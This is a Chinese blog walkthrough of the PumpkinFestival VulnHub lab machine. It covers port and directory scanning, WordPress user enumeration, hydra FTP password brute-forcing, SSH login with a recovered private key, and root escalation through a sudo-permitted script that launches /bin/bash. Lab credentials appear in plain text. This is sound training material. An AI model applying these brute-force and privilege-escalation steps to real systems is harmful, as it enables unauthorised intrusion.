PumpkinFestival靶机

于 2024-08-09 23:17:33 发布
阅读量367 收藏 13
点赞数 16
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/141072813
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:3E:67:79'

(2)端口扫描

nmap 192.168.254.150 -p- -A

(3)目录扫描

dirb http://192.168.254.150

(4)访问80端口,提到用户 harry ,看到 Alohomora! ,好像是个人名,或许可以作为账号或密码,留存

(5)这里没什么发现,f12查看源码,得到一串 token 值

45d9ee7239bc6b0bb21d3f8e1c5faa52

(6)访问robots.txt

(7)访问tokens时,权限被拒绝,可能存在文件,尝试访问token.txt,得到第二个 token

2c0e11d2200e2604587c331f02a7ebea

(8)依次拼接访问,访问 /store/track.txt 时,得到一串值和一个邮箱

Tracking code : 2542 8231 6783 486
admin@pumpkins.local

(9)看到 local ,可能需要绑定hosts,在 hosts 中写入

192.168.254.150 pumpkins.local

(10)访问 pumpkins.local,发现第三个 token

06c3eb12ef2389e2752335beccfb2080

(11)dirb目录扫描,看到有 wordpress (kali中/etc/hosts也需要配置一下)

dirb http://pumpkins.local/

(12)wpscan扫描一下,发现两个用户

wpscan --url http://pumpkins.local -e at -e ap -e u

admin
morse

(13)发现一个 readme.html 文件,访问一下,发现一串字符

http://pumpkins.local/readme.html

K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s

(14)试了试,是base62编码,解码后得到 用户morse 和 jack 和一个密码

morse & jack : Ug0t!TrIpyJ

(15)访问 wp-admin,登录,morse 用户成功登录

http://pumpkins.local/wp-admin
morse:Ug0t!TrIpyJ

(16)在 profile 下发现第四个token

7139e925fd43618653e51f820bc6201b

(17)之前 wpscan 扫描时,扫描到一个admin用户,尝试登录失败,密码,试试之前80端口看到的 Alohomora! ,登录成功,发现第五个token

admin:Alohomora!

f2e00edc353309b40e1aed18e18ab2c4

(18)ftp 尝试匿名登录,登录成功

ftp 192.168.254.150
anonymous

(19)在 secret 下发现 token.txt ,下载下来,查看文件,得到第六个 token

get token.txt
cat token.txt

2d6dbbae84d724409606eddd9dd71265

(20)目前还剩 harry 用户密码没有获取,尝试破解,使用 hydra 工具,得到密码 yrrah

hydra -l harry -P /usr/share/wordlists/rockyou.txt 192.168.254.150 ftp -e nsr

harry:yrrah

(21)登录 ftp ,发现 token.txt

ftp 192.168.254.150
harry:yrrah

(22)将文件下载下来查看,得到第七个 token

get token.txt
cat token.txt

ba9fa9abf2be9373b7cbd9a6457f374e

(23)目录 Donotopen 中,一通遍历,发现 token.txt,下载查看,得到第八个 token

get token.txt
cat token.txt

f9c5053d01e0dfc30066476ab0f0564c

getshell:

(1)还有个 NOOOOO 目录,进入后,再次进入 NOOOOOO 目录,发现一个 data.txt,下载查看,发现是乱码

(2)查看文件类型,是一个 tar 压缩包

file data.txt

(3)解压,最后 jack 为十六进制文件

tar vxf data.txt
tar xjf data
tar vxf key
cat jack

(4)使用 xxd 将 hexdump 转换,得到一个私钥

sudo apt-get update 
sudo apt-get install xxd 

更新不成功记得换源
sudo vim /etc/apt/sources.list

用#把默认官方源注释掉,再加上中科大的的url:
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

具体请看
https://blog.csdn.net/weixin_46136890/article/details/124910871

xxd -r -p jack

(5)复制内容至 aaa,赋予权限后,进行 ssh 连接,连接成功

chmod 600 aaa
ssh -i aaa jack@192.168.254.150 -p 6880

提权:

(1)查看当前目录,发现一个 token,查看为乱码

(2)查看文件类型

file token

(3)执行命令,得到第九个token

./token

8d66ef0055b43d80c34917ec6c75f706

(4)查看当前用户权限,密码 Ug0t!TrIpyJ

sudo -l
Ug0t!TrIpyJ

(5)pumpkins 目录下 alohomora 文件有root权限,创建 pumpkins 目录并创建 alohomora 文件,赋予权限并写入 /bin/bash,sudo执行,提权成功

mkdir pumpkins
cd pumpkins
vi alohomora
/bin/bash

chmod 777 alohomora
sudo ./alohomora

(6)切换到 /root 目录下,发现最后的文件

(7)看文章发现还漏一个,在 license.txt 中

http://pumpkins.local/license.txt

5ff346114d634a015ce413e1bc3d8d71

阿卡丽的神秘铺子
关注
  • 16
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LOLY: 1靶机
logan_logan的博客
07-19 616
1.端口扫描 2.在网页输入IP地址的时候发现一直跳转成loly.lc,所以在/etc/hosts添加一条解析; 3.目录枚举 通过目录枚举发现CMS是wordpress,直接上wpscan; gobuster dir -u http://10.36.101.181/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 4.WPSCAN枚举 经过枚举,成功得到用户名和密码; wpscan --url htt
南瓜节(PumpkinFestival)| 终极南瓜系列挑战
siaowei44的博客
07-17 851
概述 南瓜系列的第三关:南瓜节(PumpkinFestival) 下载链接:https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/ 靶机ip:192.168.74.193 攻击主机ip:192.168.74.128 渗透过程 首先内网扫描到靶机 然后对其进行nmap扫描,扫描其端口 信息搜集过程 (一)80端口网页 用dirb扫描一下网页目录 看看robots.txt文件 依次访问这
学习笔记-PumpkinFestival-WalkThrough
人饭子的博客
11-04 429
PumpkinFestival-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/ Description Mission-Pumpkin v1.0 is...
Vulnhub靶机-PumpkinFestival
ergeLXT的博客
06-28 632
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
metasploitable3靶机
雨泽网络工作室
08-23 1936
Metasploitable3靶机攻击 注:这些密码都是参考网站https://github.com/rapid7/metasploitable3/wiki/Configuration#credentials 21端口ftp 使用nmap扫描发现21端口打开 通过msfconsole 调出metasploit 使用ftp_login模块 使用set设置参数 使用run进行攻击 登录 22端口ssh 通过nmap扫描发现22端口开启 爆破s..
metasploitable2靶机
雨泽网络工作室
08-16 4845
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
搭建Metasploitable靶机
yzl_007的博客
08-07 1242
搭建Metasploitable靶机 开始本机下载后来解压直接报毒,上虚拟机操作(windows10) https://github.com/rapid7/metasploitable3 下载好压缩包后通过共享文件传到虚拟机上 下载packer(推荐1.35,报错更换版本) https://releases.hashicorp.com/packer/ 安装好你想要的版本后将exe文件放在想要的地方,然后添加上环境变量 例如虚拟机中是如下位置 在环境变量path里添加上即可 然后cmd packer
安装metasploitable靶机
qq_51478862的博客
04-26 2347
1下载地址:https://sourceforge.net/projects/metasploitable/ 下载好加压后,最好保存在虚拟机的目录下,好方便管理。 2·打开虚拟机,点文件中的扫描 扫描的位置要选择你保存有靶机的目录 3.然后扫描到虚拟机后点完成 4.点关闭后就安装好了 5.配置不用更改,够使用的。然后运行虚拟机 打开后选择我已复制。。 6.然后会显示让我们登录的页面 7. 这句话的意思就是用户名与密码是msfadmin 8.注意:他这个密码是没有任何回显的。登录成功后是是这个
docker搭建靶机
Z_Grant的博客
09-21 3445
文章目录一,docker(1)基础概念(2)安装docker(3)docker命令 一,docker (1)基础概念 沙箱机制 1.沙箱是一个虚拟系统程序,沙箱提供的环境相对于每一个运行的程序都是独立的,而且不会对现有的系统产生影响. 2.沙箱具有非常良好的独立性、隔离性,所以能够搭建一些具有高风险的软件进行测试. docker 一个开源的应用容器引擎,基于GO语言 作用:开发者打包他...
vulnhub靶机:FunBox
Keepb1ue的博客
09-28 3059
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 靶机:DC1 (VirtualBox) IP:192.168.56.109 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。 靶机渗透开始: 先看下手里的
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
java培训笔记.doc
最新发布
08-09
java培训笔记
财务付款申请书.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于SSM++jsp的大学生兼职平台
08-09
内容概要 大学生兼职平台是一个基于SSM(Spring、Spring MVC、MyBatis)框架和JSP技术开发的在线平台,专为大学生提供丰富的兼职机会和企业招聘信息。该系统的主要功能包括兼职信息发布、职位搜索与匹配、简历管理、申请流程跟踪、企业招聘管理等。学生可以通过平台轻松查找适合自己的兼职工作,提交简历并在线申请职位;企业则可以发布招聘信息,筛选并联系合适的候选人。平台采用简洁直观的界面设计,确保用户的操作体验顺畅,同时保障用户信息的安全与隐私。 适用人群 本系统主要面向在校大学生以及提供兼职岗位的企业和个人招聘者。系统尤其适合那些希望通过兼职积累工作经验、减轻经济负担的大学生使用。此外,平台也适合创业公司、中小企业,以及需要短期雇员的个人招聘者使用,帮助他们找到合适的学生兼职人员。 使用场景及目标 兼职信息发布:企业和个人招聘者可以通过平台发布兼职岗位信息,包含职位描述、工作要求、薪酬待遇等内容,快速吸引潜在应聘者。 职位搜索与匹配:大学生可以根据自己的需求和条件,利用平台提供的搜索和筛选功能,找到适合自己的兼职工作。平台还支持智能匹配功能,推荐最符合学生简历的岗位。 简
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值